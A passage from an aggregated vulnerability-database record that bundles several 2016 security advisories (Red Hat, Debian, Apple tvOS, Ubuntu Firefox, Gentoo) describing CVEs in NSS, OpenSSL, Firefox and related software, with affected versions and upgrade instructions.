https://gpgtools.org\n\niQIcBAEBCgAGBQJXjXAvAAoJEIOj74w0bLRG/5EP/2v9SJTrO+/4b3A1gqC1ch8y\n+cJ04tXRsO7rvjKT5nCylo30U0Sanz/bUbDx4559YS7/P/IyeyZVheaTJwK8wzEy\npSOPpy35hUuVIw0/p4YsuHDThSBPFMmDljTxH7elkfuBV1lPSrCkyDXc0re2HxWV\nxj68zAxtM0jkkhgcxb2ApZSZVXhrjUZtbY0xEVOoWKKFwbMvKfx+4xSqunwQeS1u\nwevs1EbxfvsZbc3pG+xYcOonbegBzOy9aCvNO1Yv1zG+AYXC5ERMq1vk3PsWOTQN\nZVY1I7mvCaEfvmjq2isRw8XYapAIKISDLwMKBSYrZDQFwPQLRi1VXxQZ67Kq1M3k\nah04/lr0RIcoosIcBqxD2+1UAFjUzEUNFkYivjhuaeegN2QdL7Ujegf1QjdAt8lk\nmmKduxYUDOaRX50Kw7n14ZveJqzE1D5I6QSItaZ9M1vR60a7u91DSj9D87vbt1YC\nJM/Rvf/4vonp1NjwA2JQwCiZfYliBDdn9iiCl8mzxdsSRD/wXcZCs05nnKmKsCfc\n55ET7IwdG3622lVheOJGQZuucwJiTn36zC11XVzZysQd/hLD5rUKUQNX1WOgZdzs\nxPsslXF5MWx9jcdyWVSWxDrN0sFk+GpQFQDuVozP60xuxqR3qQ0TXir2NP39uIF5\nYozOGPQFmX0OviWCQsX6\n=ng+m\n-----END PGP SIGNATURE-----\n. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). (CVE-2014-8176,\nCVE-2015-0209, CVE-2015-0286, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196,\nCVE-2015-3216, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799,\nCVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2108, CVE-2016-2109,\nCVE-2016-2177, CVE-2016-2178, CVE-2016-2842)\n\n* This update fixes several flaws in libxml2. (CVE-2016-1762,\nCVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837,\nCVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705,\nCVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)\n\n* This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420,\nCVE-2016-7141)\n\n* This update fixes two flaws in httpd. (CVE-2014-3523, CVE-2015-3185)\n\n* This update fixes two flaws in mod_cluster. (CVE-2016-4459,\nCVE-2016-8612)\n\n* A buffer overflow flaw when concatenating virtual host names and URIs was\nfixed in mod_jk. (CVE-2016-6808)\n\n* A memory leak flaw was fixed in expat. \n\nAfter installing the updated packages, the httpd daemon will be restarted\nautomatically. JIRA issues fixed (https://issues.jboss.org/):\n\nJBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0]\nJBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service\n\n6",
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"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2016-2106",
"ident": null
},
{
"date": "2017-05-02T01:10:00",
"db": "BID",
"id": "89744",
"ident": null
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2016-2106",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "network",
"sources": [
{
"db": "BID",
"id": "89744"
}
],
"trust": 0.3
},
"title": {
"_id": null,
"data": "OpenSSL CVE-2016-2106 Integer Overflow Vulnerability",
"sources": [
{
"db": "BID",
"id": "89744"
}
],
"trust": 0.3
},
"type": {
"_id": null,
"data": "Boundary Condition Error",
"sources": [
{
"db": "BID",
"id": "89744"
}
],
"trust": 0.3
}
}
VAR-201603-0244
Vulnerability from variot - Updated: 2026-04-10 23:29Heap-based buffer overflow in Mozilla Network Security Services (NSS) before 3.19.2.3 and 3.20.x and 3.21.x before 3.21.1, as used in Mozilla Firefox before 45.0 and Firefox ESR 38.x before 38.7, allows remote attackers to execute arbitrary code via crafted ASN.1 data in an X.509 certificate. Both Mozilla Firefox and Firefox ESR are developed by the Mozilla Foundation in the United States. The following products and versions are affected: Mozilla Firefox prior to 45.0, Firefox ESR prior to 38.7 38.x, Mozilla NSS prior to 3.19.2.3, 3.20.x, 3.21.1 prior to 3.21.x.
CVE-2015-4000
David Adrian et al. reported that it may be feasible to attack
Diffie-Hellman-based cipher suites in certain circumstances,
compromising the confidentiality and integrity of data encrypted
with Transport Layer Security (TLS).
CVE-2015-7181 CVE-2015-7182 CVE-2016-1950
Tyson Smith, David Keeler, and Francis Gabriel discovered
heap-based buffer overflows in the ASN.1 DER parser, potentially
leading to arbitrary code execution.
CVE-2015-7575
Karthikeyan Bhargavan discovered that TLS client implementation
accepted MD5-based signatures for TLS 1.2 connections with forward
secrecy, weakening the intended security strength of TLS
connections.
CVE-2016-1938
Hanno Boeck discovered that NSS miscomputed the result of integer
division for certain inputs. This could weaken the cryptographic
protections provided by NSS. However, NSS implements RSA-CRT leak
hardening, so RSA private keys are not directly disclosed by this
issue.
CVE-2016-1978
Eric Rescorla discovered a user-after-free vulnerability in the
implementation of ECDH-based TLS handshakes, with unknown
consequences.
CVE-2016-1979
Tim Taubert discovered a use-after-free vulnerability in ASN.1 DER
processing, with application-specific impact.
CVE-2016-2834
Tyson Smith and Jed Davis discovered unspecified memory-safety
bugs in NSS.
In addition, the NSS library did not ignore environment variables in processes which underwent a SUID/SGID/AT_SECURE transition at process start. In certain system configurations, this allowed local users to escalate their privileges.
For the stable distribution (jessie), these problems have been fixed in version 2:3.26-1+debu8u1.
For the unstable distribution (sid), these problems have been fixed in version 2:3.23-1.
We recommend that you upgrade your nss packages. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2016-03-21-3 tvOS 9.2
tvOS 9.2 is now available and addresses the following:
FontParser Available for: Apple TV (4th generation) Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with Trend Micro's Zero Day Initiative (ZDI)
HTTPProtocol Available for: Apple TV (4th generation) Impact: A remote attacker may be able to execute arbitrary code Description: Multiple vulnerabilities existed in nghttp2 versions prior to 1.6.0, the most serious of which may have led to remote code execution. These were addressed by updating nghttp2 to version 1.6.0. CVE-ID CVE-2015-8659
IOHIDFamily Available for: Apple TV (4th generation) Impact: An application may be able to determine kernel memory layout Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1748 : Brandon Azad
Kernel Available for: Apple TV (4th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed through improved memory management. CVE-ID CVE-2016-1750 : CESG
Kernel Available for: Apple TV (4th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple integer overflows were addressed through improved input validation. CVE-ID CVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
Kernel Available for: Apple TV (4th generation) Impact: An application may be able to bypass code signing Description: A permissions issue existed in which execute permission was incorrectly granted. This issue was addressed through improved permission validation. CVE-ID CVE-2016-1751 : Eric Monti of Square Mobile Security
Kernel Available for: Apple TV (4th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2016-1755 : Ian Beer of Google Project Zero
Kernel Available for: Apple TV (4th generation) Impact: An application may be able to cause a denial of service Description: A denial of service issue was addressed through improved validation. CVE-ID CVE-2016-1752 : CESG
libxml2 Available for: Apple TV (4th generation) Impact: Processing maliciously crafted XML may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2015-1819 CVE-2015-5312 : David Drysdale of Google CVE-2015-7499 CVE-2015-7500 : Kostya Serebryany of Google CVE-2015-7942 : Kostya Serebryany of Google CVE-2015-8035 : gustavo.grieco CVE-2015-8242 : Hugh Davenport CVE-2016-1762
Security Available for: Apple TV (4th generation) Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution Description: A memory corruption issue existed in the ASN.1 decoder. This issue was addressed through improved input validation. CVE-ID CVE-2016-1950 : Francis Gabriel of Quarkslab
TrueTypeScaler Available for: Apple TV (4th generation) Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2016-1775 : 0x1byte working with Trend Micro's Zero Day Initiative (ZDI)
WebKit Available for: Apple TV (4th generation) Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1783 : Mihai Parparita of Google
WebKit History Available for: Apple TV (4th generation) Impact: Processing maliciously crafted web content may lead to an unexpected Safari crash Description: A resource exhaustion issue was addressed through improved input validation. CVE-ID CVE-2016-1784 : Moony Li and Jack Tang of TrendMicro and 李普君 of 无声信息技术PKAV Team (PKAV.net)
Wi-Fi Available for: Apple TV (4th generation) Impact: An attacker with a privileged network position may be able to execute arbitrary code Description: A frame validation and memory corruption issue existed for a given ethertype. This issue was addressed through additional ethertype validation and improved memory handling. CVE-ID CVE-2016-0801 : an anonymous researcher CVE-2016-0802 : an anonymous researcher
Installation note:
Apple TV will periodically check for software updates. Alternatively, you may manually check for software updates by selecting "Settings -> System -> Software Update -> Update Software.".
To check the current version of software, select "Settings -> General -> About". ============================================================================ Ubuntu Security Notice USN-2917-2 April 07, 2016
firefox regressions
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 15.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
USN-2917-1 introduced several regressions in Firefox.
Software Description: - firefox: Mozilla Open Source web browser
Details:
USN-2917-1 fixed vulnerabilities in Firefox. This update caused several regressions that could result in search engine settings being lost, the list of search providers appearing empty or the location bar breaking after typing an invalid URL. This update fixes the problem.
We apologize for the inconvenience.
Original advisory details:
Francis Gabriel discovered a buffer overflow during ASN.1 decoding in NSS. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Firefox. (CVE-2016-1950)
Bob Clary, Christoph Diehl, Christian Holler, Andrew McCreight, Daniel Holbert, Jesse Ruderman, Randell Jesup, Carsten Book, Gian-Carlo Pascutto, Tyson Smith, Andrea Marchesini, and Jukka Jyl=C3=A4nki discovered multiple memory safety issues in Firefox. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Firefox. (CVE-2016-1952, CVE-2016-1953)
Nicolas Golubovic discovered that CSP violation reports can be used to overwrite local files. If a user were tricked in to opening a specially crafted website with addon signing disabled and unpacked addons installed, an attacker could potentially exploit this to gain additional privileges. (CVE-2016-1954)
Muneaki Nishimura discovered that CSP violation reports contained full paths for cross-origin iframe navigations. An attacker could potentially exploit this to steal confidential data. (CVE-2016-1955)
Ucha Gobejishvili discovered that performing certain WebGL operations resulted in memory resource exhaustion with some Intel GPUs, requiring a reboot. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service. (CVE-2016-1956)
Jose Martinez and Romina Santillan discovered a memory leak in libstagefright during MPEG4 video file processing in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via memory exhaustion. (CVE-2016-1957)
Abdulrahman Alqabandi discovered that the addressbar could be blank or filled with page defined content in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to conduct URL spoofing attacks. (CVE-2016-1958)
Looben Yang discovered an out-of-bounds read in Service Worker Manager. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Firefox. (CVE-2016-1959)
A use-after-free was discovered in the HTML5 string parser. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Firefox. (CVE-2016-1960)
A use-after-free was discovered in the SetBody function of HTMLDocument. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Firefox. (CVE-2016-1961)
Dominique Haza=C3=ABl-Massieux discovered a use-after-free when using multiple WebRTC data channels. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Firefox. (CVE-2016-1962)
It was discovered that Firefox crashes when local files are modified whilst being read by the FileReader API. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to execute arbitrary code with the privileges of the user invoking Firefox. (CVE-2016-1963)
Nicolas Gr=C3=A9goire discovered a use-after-free during XML transformations. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Firefox. (CVE-2016-1964)
Tsubasa Iinuma discovered a mechanism to cause the addressbar to display an incorrect URL, using history navigations and the Location protocol property. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to conduct URL spoofing attacks. (CVE-2016-1965)
A memory corruption issues was discovered in the NPAPI subsystem. If a user were tricked in to opening a specially crafted website with a malicious plugin installed, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Firefox. (CVE-2016-1966)
Jordi Chancel discovered a same-origin-policy bypass when using performance.getEntries and history navigation with session restore. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to steal confidential data. (CVE-2016-1967)
Luke Li discovered a buffer overflow during Brotli decompression in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Firefox. (CVE-2016-1968)
Ronald Crane discovered a use-after-free in GetStaticInstance in WebRTC. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Firefox. (CVE-2016-1973)
Ronald Crane discovered an out-of-bounds read following a failed allocation in the HTML parser in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Firefox. (CVE-2016-1974)
Holger Fuhrmannek, Tyson Smith and Holger Fuhrmannek reported multiple memory safety issues in the Graphite 2 library. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Firefox. (CVE-2016-1977, CVE-2016-2790, CVE-2016-2791, CVE-2016-2792, CVE-2016-2793, CVE-2016-2794, CVE-2016-2795, CVE-2016-2796, CVE-2016-2797, CVE-2016-2798, CVE-2016-2799, CVE-2016-2800, CVE-2016-2801, CVE-2016-2802)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 15.10: firefox 45.0.1+build1-0ubuntu0.15.10.2
Ubuntu 14.04 LTS: firefox 45.0.1+build1-0ubuntu0.14.04.2
Ubuntu 12.04 LTS: firefox 45.0.1+build1-0ubuntu0.12.04.2
After a standard system update you need to restart Firefox to make all the necessary changes.
References: http://www.ubuntu.com/usn/usn-2917-2 http://www.ubuntu.com/usn/usn-2917-1 https://launchpad.net/bugs/1567671
Package Information: https://launchpad.net/ubuntu/+source/firefox/45.0.1+build1-0ubuntu0.15.10.2 https://launchpad.net/ubuntu/+source/firefox/45.0.1+build1-0ubuntu0.14.04.2 https://launchpad.net/ubuntu/+source/firefox/45.0.1+build1-0ubuntu0.12.04.2 . The SeaMonkey project is a community effort to deliver production-quality releases of code derived from the application formerly known as 'Mozilla Application Suite'.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/nspr < 4.12 >= 4.12 2 dev-libs/nss < 3.22.2 >= 3.22.2 3 mail-client/thunderbird < 38.7.0 >= 38.7.0 4 mail-client/thunderbird-bin < 38.7.0 >= 38.7.0 5 www-client/firefox < 38.7.0 >= 38.7.0 6 www-client/firefox-bin < 38.7.0 >= 38.7.0 ------------------------------------------------------------------- 6 affected packages
Description
Multiple vulnerabilities have been discovered in Firefox, NSS, NSPR, and Thunderbird. Please review the CVE identifiers referenced below for details. Furthermore, a remote attacker may be able to perform Man-in-the-Middle attacks, obtain sensitive information, spoof the address bar, conduct clickjacking attacks, bypass security restrictions and protection mechanisms, or have other unspecified impacts.
Workaround
There is no known workaround at this time.
Resolution
All NSS users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/nss-3.22.2"
All Thunderbird users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-38.7.0"=
All users of the Thunderbird binary package should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=mail-client/thunderbird-bin-38.7.0"
All Firefox 38.7.x users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=www-client/firefox-38.7.0"
All users of the Firefox 38.7.x binary package should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-38.7.0"
References
[ 1 ] CVE-2015-2708 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2708 [ 2 ] CVE-2015-2708 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2708 [ 3 ] CVE-2015-2709 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2709 [ 4 ] CVE-2015-2709 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2709 [ 5 ] CVE-2015-2710 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2710 [ 6 ] CVE-2015-2710 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2710 [ 7 ] CVE-2015-2711 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2711 [ 8 ] CVE-2015-2711 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2711 [ 9 ] CVE-2015-2712 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2712 [ 10 ] CVE-2015-2712 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2712 [ 11 ] CVE-2015-2713 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2713 [ 12 ] CVE-2015-2713 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2713 [ 13 ] CVE-2015-2714 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2714 [ 14 ] CVE-2015-2714 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2714 [ 15 ] CVE-2015-2715 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2715 [ 16 ] CVE-2015-2715 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2715 [ 17 ] CVE-2015-2716 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2716 [ 18 ] CVE-2015-2716 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2716 [ 19 ] CVE-2015-2717 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2717 [ 20 ] CVE-2015-2717 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2717 [ 21 ] CVE-2015-2718 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2718 [ 22 ] CVE-2015-2718 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2718 [ 23 ] CVE-2015-4473 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4473 [ 24 ] CVE-2015-4473 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4473 [ 25 ] CVE-2015-4474 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4474 [ 26 ] CVE-2015-4474 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4474 [ 27 ] CVE-2015-4475 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4475 [ 28 ] CVE-2015-4475 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4475 [ 29 ] CVE-2015-4477 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4477 [ 30 ] CVE-2015-4477 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4477 [ 31 ] CVE-2015-4478 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4478 [ 32 ] CVE-2015-4478 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4478 [ 33 ] CVE-2015-4479 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4479 [ 34 ] CVE-2015-4479 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4479 [ 35 ] CVE-2015-4480 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4480 [ 36 ] CVE-2015-4480 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4480 [ 37 ] CVE-2015-4481 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4481 [ 38 ] CVE-2015-4481 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4481 [ 39 ] CVE-2015-4482 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4482 [ 40 ] CVE-2015-4482 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4482 [ 41 ] CVE-2015-4483 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4483 [ 42 ] CVE-2015-4483 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4483 [ 43 ] CVE-2015-4484 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4484 [ 44 ] CVE-2015-4484 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4484 [ 45 ] CVE-2015-4485 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4485 [ 46 ] CVE-2015-4485 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4485 [ 47 ] CVE-2015-4486 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4486 [ 48 ] CVE-2015-4486 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4486 [ 49 ] CVE-2015-4487 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4487 [ 50 ] CVE-2015-4487 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4487 [ 51 ] CVE-2015-4488 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4488 [ 52 ] CVE-2015-4488 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4488 [ 53 ] CVE-2015-4489 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4489 [ 54 ] CVE-2015-4489 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4489 [ 55 ] CVE-2015-4490 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4490 [ 56 ] CVE-2015-4490 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4490 [ 57 ] CVE-2015-4491 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4491 [ 58 ] CVE-2015-4491 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4491 [ 59 ] CVE-2015-4492 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4492 [ 60 ] CVE-2015-4492 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4492 [ 61 ] CVE-2015-4493 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4493 [ 62 ] CVE-2015-4493 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4493 [ 63 ] CVE-2015-7181 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7181 [ 64 ] CVE-2015-7182 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7182 [ 65 ] CVE-2015-7183 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7183 [ 66 ] CVE-2016-1523 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1523 [ 67 ] CVE-2016-1523 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1523 [ 68 ] CVE-2016-1930 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1930 [ 69 ] CVE-2016-1930 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1930 [ 70 ] CVE-2016-1931 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1931 [ 71 ] CVE-2016-1931 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1931 [ 72 ] CVE-2016-1933 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1933 [ 73 ] CVE-2016-1933 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1933 [ 74 ] CVE-2016-1935 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1935 [ 75 ] CVE-2016-1935 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1935 [ 76 ] CVE-2016-1937 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1937 [ 77 ] CVE-2016-1937 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1937 [ 78 ] CVE-2016-1938 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1938 [ 79 ] CVE-2016-1938 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1938 [ 80 ] CVE-2016-1939 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1939 [ 81 ] CVE-2016-1939 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1939 [ 82 ] CVE-2016-1940 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1940 [ 83 ] CVE-2016-1940 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1940 [ 84 ] CVE-2016-1941 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1941 [ 85 ] CVE-2016-1941 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1941 [ 86 ] CVE-2016-1942 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1942 [ 87 ] CVE-2016-1942 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1942 [ 88 ] CVE-2016-1943 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1943 [ 89 ] CVE-2016-1943 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1943 [ 90 ] CVE-2016-1944 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1944 [ 91 ] CVE-2016-1944 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1944 [ 92 ] CVE-2016-1945 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1945 [ 93 ] CVE-2016-1945 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1945 [ 94 ] CVE-2016-1946 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1946 [ 95 ] CVE-2016-1946 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1946 [ 96 ] CVE-2016-1947 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1947 [ 97 ] CVE-2016-1947 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1947 [ 98 ] CVE-2016-1948 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1948 [ 99 ] CVE-2016-1948 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1948 [ 100 ] CVE-2016-1949 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1949 [ 101 ] CVE-2016-1949 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1949 [ 102 ] CVE-2016-1950 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1950 [ 103 ] CVE-2016-1950 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1950 [ 104 ] CVE-2016-1952 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1952 [ 105 ] CVE-2016-1952 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1952 [ 106 ] CVE-2016-1953 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1953 [ 107 ] CVE-2016-1953 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1953 [ 108 ] CVE-2016-1954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1954 [ 109 ] CVE-2016-1954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1954 [ 110 ] CVE-2016-1955 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1955 [ 111 ] CVE-2016-1955 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1955 [ 112 ] CVE-2016-1956 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1956 [ 113 ] CVE-2016-1956 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1956 [ 114 ] CVE-2016-1957 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1957 [ 115 ] CVE-2016-1957 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1957 [ 116 ] CVE-2016-1958 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1958 [ 117 ] CVE-2016-1958 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1958 [ 118 ] CVE-2016-1959 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1959 [ 119 ] CVE-2016-1959 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1959 [ 120 ] CVE-2016-1960 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1960 [ 121 ] CVE-2016-1960 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1960 [ 122 ] CVE-2016-1961 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1961 [ 123 ] CVE-2016-1961 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1961 [ 124 ] CVE-2016-1962 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1962 [ 125 ] CVE-2016-1962 